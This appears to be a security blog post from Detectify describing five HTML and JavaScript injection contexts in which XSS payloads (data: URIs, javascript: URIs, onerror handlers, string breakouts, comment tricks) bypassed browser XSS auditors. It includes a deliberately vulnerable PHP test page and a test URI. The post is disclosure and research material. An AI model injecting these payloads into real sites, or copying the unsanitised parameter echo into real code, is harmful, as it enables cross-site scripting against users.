While implementing a new JavaScript engine into Detectify, we discovered that the XSS auditors in modern browsers wasn’t as good at catching special cases as we thought. Considering that we had such a good response to our previous post on bypassing the Chrome XSS Auditor, we thought this would make a fitting post.
<script src="[Injection]"></script>
Injection: data:,alert(1)
<script src="data:,alert(1)"></script>
Works in: Chrome, Opera, Firefox, IE
<img src="notfound" onerror="[Injection]" />
Injection: alert(2)
<img src="notfound" onerror="alert(2)" />
Works in: Chrome, Opera, Firefox, IE
<script>var string = "[Injection]"</script>
Injection: “alert(3)”
<script>var string = ""*alert(3)*""</script>
Works in: Chrome, Opera, Firefox
<iframe src="[Injection]"></iframe>
Injection: javascript:alert(4)
<frame src="javascript:alert(4)"></iframe>
Works in: Chrome, Opera, Firefox
Some [Injection] text on the same line [Injection]
Injection: %0aalert(5)</script><script>–>
Some alert(5)</script><script>--> text on the same line alert(5)</script><script>-->
Works in: Chrome, Opera, Firefox
Note that context 5 only work with the “–>” style comment, and won’t work with “/*” or “//” style comments.
<html> <script src="<?=@$_GET[1]?>"></script> <script>var string = "<?=@$_GET[2]?>"</script> <iframe src="<?=@$_GET[3]?>"></iframe> <img src="x" onerror=<?=@$_GET[4]?> /> Some <?=@$_GET[5]?>text on the same line<?=@$_GET[5]?> </html>
Test URI: ?1=data:,alert(1)&2=“alert(2)”&3=javascript:alert(3)&4=onerror=alert(4)&5=%0aalert(5)</script><script>–>
To the defense of the developers of the auditors/filters, these filters are only supposed to be a mitigation, and “as good as possible”. While it’s no secret that they don’t catch everything, we still thought we would share the specific contexts we had discovered.
Combining response-type switching, invalid state and redirect-uri quirks using OAuth, with third-party javascript-inclusions has multiple vulnerable scenarios where authorization codes or tokens could leak to …
CloudKit, the data storage framework by Apple, has various access controls. These access controls could be misconfigured, even by Apple themselves, which affected Apple’s own apps using CloudKit. This blog post explains in detail three bugs found in iCrowd+, Apple News and Apple Shortcuts with different criticality uncovered by Frans Rosen while hacking Cloudkit. All bugs were reported to and fixed by the Apple Security Bounty program.
